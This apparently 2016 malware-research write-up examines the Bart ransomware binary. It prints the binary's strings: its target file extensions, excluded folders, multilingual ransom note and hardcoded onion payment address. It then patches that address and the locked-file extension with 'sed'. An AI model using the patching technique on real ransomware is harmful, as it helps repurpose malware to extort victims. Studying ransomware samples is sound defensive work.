#!/bin/sh
#
#  Bart Ransomware (Win32/Filecoder.Bart) (Kidnapping) Resource Hacking
#
#
#  Copyright 2016 (c) Todor Donev 
#  <todor.donev at gmail.com>
#  https://www.ethical-hacker.org/
#  https://www.facebook.com/ethicalhackerorg
#
#
##  Thanks to Maya Hristova for supporting me.
#
#
#  Description:
#  Bart is a simple yet insidious ransomware 
#  program that locks files in encrypted, 
#  inaccessible archives until a ransom is paid.
#  Bart, like most ransomware programs, searches 
#  for files that match a given description, then 
#  encrypts those files, leaving them unusable. 
#  This means all files with certain extensions (e.g. 
#  .pdf or .xls) will be inaccessible until 
#  the victim acquires the key. To obtain the key, 
#  the victim must pay a ransom.
#
#  Some of the main features of Bart ransomware 
#  include the following:
#    o  The software enters the computer through a ZIP 
#  attachment to an email.
#    o  The attachment contains a JavaScript file 
#  that, if executed, initiates the installation 
#  of Bart.
#    o  Unlike similar malware, Bart locks your 
#  files in encrypted, password-protected ZIP 
#  archives, rendering the files inaccessible. 
#  After the encryption, the naming format 
#  for the resulting ZIP archive is as follows: 
#  original_name.bart.zip.
#
#  Disclaimer:
#  These and previous programs are for educational 
#  purposes ONLY. Do not use them without permission. 
#  The usual disclaimer applies, especially the 
#  fact that Todor Donev is not liable for any 
#  damages caused by direct or indirect use of the 
#  information or functionality provided by these 
#  programs. The author or any Internet provider 
#  bears NO responsibility for content or misuse 
#  of these programs or any derivatives thereof.
#  By using these programs you accept the fact 
#  that any damage (data loss, system crash, 
#  system compromise, etc.) caused by the use 
#  of these programs is not Todor Donev's 
#  responsibility.
#   
#  Use them at your own risk!
#  


[todor@adamantium]$ strings bart.bin | grep -i -A 235 "Tahoma"

#   Tahoma
#   Control Panel\Desktop
#   WallpaperStyle
#   TileWallpaper
#   AnOh/Cz9MMLiZMS9k/8huVvEbF6cg1TklaAQBLADaGiV
#   winnt
#   Application Data
#   AppData
#   PerfLogs
#   Program Files (x86)
#   Program Files
#   ProgramData
#   temp
#   Recovery
#   $Recycle.Bin
#   System Volume Information
#   Boot
#   Windows
#   .n64
#   .m4u
#   .m3u
#   .mid
#   .wma
#   .flv
#   .3g2
#   .mkv
#   .3gp
#   .mp4
#   .mov
#   .avi
#   .asf
#   .mpeg
#   .vob
#   .mpg
#   .wmv
#   .fla
#   .swf
#   .wav
#   .mp3
#   .qcow2
#   .vdi
#   .vmdk
#   .vmx
#   .gpg
#   .aes
#   .ARC
#   .PAQ
#   .tar.bz2
#   .tbk
#   .bak
#   .tar
#   .tgz
#   .rar
#   .zip
#   .djv
#   .djvu
#   .svg
#   .bmp
#   .png
#   .gif
#   .raw
#   .cgm
#   .jpeg
#   .jpg
#   .tif
#   .tiff
#   .NEF
#   .psd
#   .cmd
#   .bat
#   .class
#   .jar
#   .java
#   .asp
#   .brd
#   .sch
#   .dch
#   .dip
#   .vbs
#   .asm
#   .pas
#   .cpp
#   .php
#   .ldf
#   .mdf
#   .ibd
#   .MYI
#   .MYD
#   .frm
#   .odb
#   .dbf
#   .mdb
#   .SQLITEDB
#   .SQLITE3
#   .asc
#   .lay6
#   .lay
#   .ms11(Security copy)
#   .ms11
#   .sldm
#   .sldx
#   .ppsm
#   .ppsx
#   .ppam
#   .docb
#   .sxm
#   .otg
#   .odg
#   .uop
#   .potx
#   .potm
#   .pptx
#   .pptm
#   .std
#   .sxd
#   .pot
#   .pps
#   .sti
#   .sxi
#   .otp
#   .odp
#   .wb2
#   .123
#   .wks
#   .wk1
#   .xltx
#   .xltm
#   .xlsx
#   .xlsm
#   .xlsb
#   .slk
#   .xlw
#   .xlt
#   .xlm
#   .xlc
#   .dif
#   .stc
#   .sxc
#   .ots
#   .ods
#   .hwp
#   .602
#   .dotm
#   .dotx
#   .docm
#   .docx
#   .DOT
#   .3dm
#   .max
#   .3ds
#   .txt
#   .CSV
#   .uot
#   .RTF
#   .pdf
#   .XLS
#   .PPT
#   .stw
#   .sxw
#   .ott
#   .odt
#   .DOC
#   .pem
#   .p12
#   .csr
#   .crt
#   .key
#   !!! IMPORTANT INFORMATION !!!
#   All your files are encrypted.
#   Decrypting of your files is only possible with the private key, which is on our secret server.
#   To receive your private key follow one of the links:
#   	1. http://%s.tor2web.org/?id=%s
#   	2. http://%s.onion.to/?id=%s
#   	3. http://%s.onion.cab/?id=%s
#   	4. http://%s.onion.link/?id=%s
#   If all addresses are not available, follow these steps:
#   	1. Download and install Tor Browser: https://torproject.org/download/download-easy.html
#   	2. After successfull installation, run the browser and wait for initialization.
#   	3. Type in the address bar:
#   	   %s.onion/?id=%s
#   	4. Follow the instructions on the site.
#   !!! INFORMAZIONI IMPORTANTI !!!
#   Tutti i file sono criptati.
#   Decifrare dei file ? possibile solo con la chiave privata, che ? sul nostro server segreto.
#   Per ricevere la chiave privata seguire uno dei link : 
#   1. http://%s.tor2web.org/?id=%s
#            2. http://%s.onion.to/?id=%s
#            3. http://%s.onion.cab/?id=%s
#            4. http://%s.onion.link/?id=%s
#     Se tutti gli indirizzi non sono disponibili, attenersi alla seguente procedura:
#             1. Scaricare e installare Tor Browser: https://torproject.org/download/download-easy.html
#             2. Dopo l'installazione di successo, eseguire il browser e attendere l'inizializzazione.
#             3. Digitare nella barra degli indirizzi:
#                 %s.onion/?id=%s
#             4. Seguire le istruzioni sul sito
#   !!! INFORMATIONS IMPORTANTES !!!
#   Tous vos fichiers sont crypt?s.
#   D?chiffrer de vos fichiers est seulement possible avec la cl? priv?e, qui est sur notre serveur secret.
#   Pour recevoir votre cl? priv?e suivre l'un des liens:
#   	1. http://%s.tor2web.org/?id=%s
#   	2. http://%s.onion.to/?id=%s
#   	3. http://%s.onion.cab/?id=%s
#   	4. http://%s.onion.link/?id=%s
#   Si toutes les adresses ne sont pas disponibles, proc?dez comme suit:
#   	1. T?l?chargez et installez Tor Browser: https://torproject.org/download/download-easy.html
#   	2. Une fois l'installation r?ussie, ex?cutez le navigateur et attendez que l'initialisation.
#   	3. Tapez dans la barre d'adresse:
#   	   %s.onion/?id=%s
#   	   	4. Suivez les instructions sur le site.
#   !!! WICHTIGE INFORMATIONEN !!!
#   Alle Ihre Dateien werden verschl?sselt.
#   Entschl?sseln der Dateien ist nur mit dem privaten Schl?ssel, die auf unserer geheimen Server ist.
#   So empfangen Sie Ihren privaten Schl?ssel auf einen der Links folgen:
#   	1. http://%s.tor2web.org/?id=%s
#   	2. http://%s.onion.to/?id=%s
#   	3. http://%s.onion.cab/?id=%s
#   	4. http://%s.onion.link/?id=%s
#   Wenn alle Adressen nicht verf?gbar sind, gehen Sie folgenderma?en vor:
#   	1. Downloaden und installieren Browser Tor: https://torproject.org/download/download-easy.html
#   	2. Nach erfolgreicher Installation der Browser ausgef?hrt wird und f?r die Initialisierung warten.
#   	3. Geben Sie in der Adressleiste:
#   	   %s.onion/?id=%s
#   	   	4. Folgen Sie den Anweisungen auf der Website.
#   	!!! Your personal identification ID: %s !!!
#   	!!! La vostra identificazione personale ID: %s !!!
#   	!!! Votre identification personnelle ID: %s !!!
#   	!!! Ihre pers?nliche Identifikations ID: %s !!!
#   	!!! Su identificaci?n personal ID : %s !!!
#   khh5cmzh5q7yp7th                                    #  DARKWEB ADDRESS: http://khh5cmzh5q7yp7th.onion/
#   .bart                                               #  LOCKED FILE FORMAT: .bart.zip
#   .recover.
#   \\.\
#   recover.txt
#   \recover.bmp
#   \recover.txt
#   notepad.exe "

[todor@adamantium]$ sed -i 's/khh5cmzh5q7yp7th/1234567890123456/g' bart.bin
[todor@adamantium]$ strings bart.bin | grep -i -A 5 "personal"

# 	!!! Your personal identification ID: %s !!!
# 	!!! La vostra identificazione personale ID: %s !!!
# 	!!! Votre identification personnelle ID: %s !!!
# 	!!! Ihre pers?nliche Identifikations ID: %s !!!
# 	!!! Su identificaci?n personal ID : %s !!!
#   1234567890123456                                     # DARKWEB ADDRESS IS CHANGED TO: http://1234567890123456.onion/ (Invalid TOR address)
#   .bart
#   .recover.
#   \\.\
#   recover.txt

[todor@adamantium]$ sed -i 's/.bart/.ethk/g' bart.bin

[todor@adamantium]$ strings bart.bin | grep -i -A 5 "personal"

# 	!!! Your personal identification ID: %s !!!
# 	!!! La vostra identificazione personale ID: %s !!!
# 	!!! Votre identification personnelle ID: %s !!!
# 	!!! Ihre pers?nliche Identifikations ID: %s !!!
# 	!!! Su identificaci?n personal ID : %s !!!
#   1234567890123456                                     # DARKWEB ADDRESS IS CHANGED TO: http://1234567890123456.onion/ (Invalid TOR address)
#   .ethk                                                # LOCKED FILE FORMAT IS CHANGED TO: .ethk.zip
#   .recover.
#   \\.\
#   recover.txt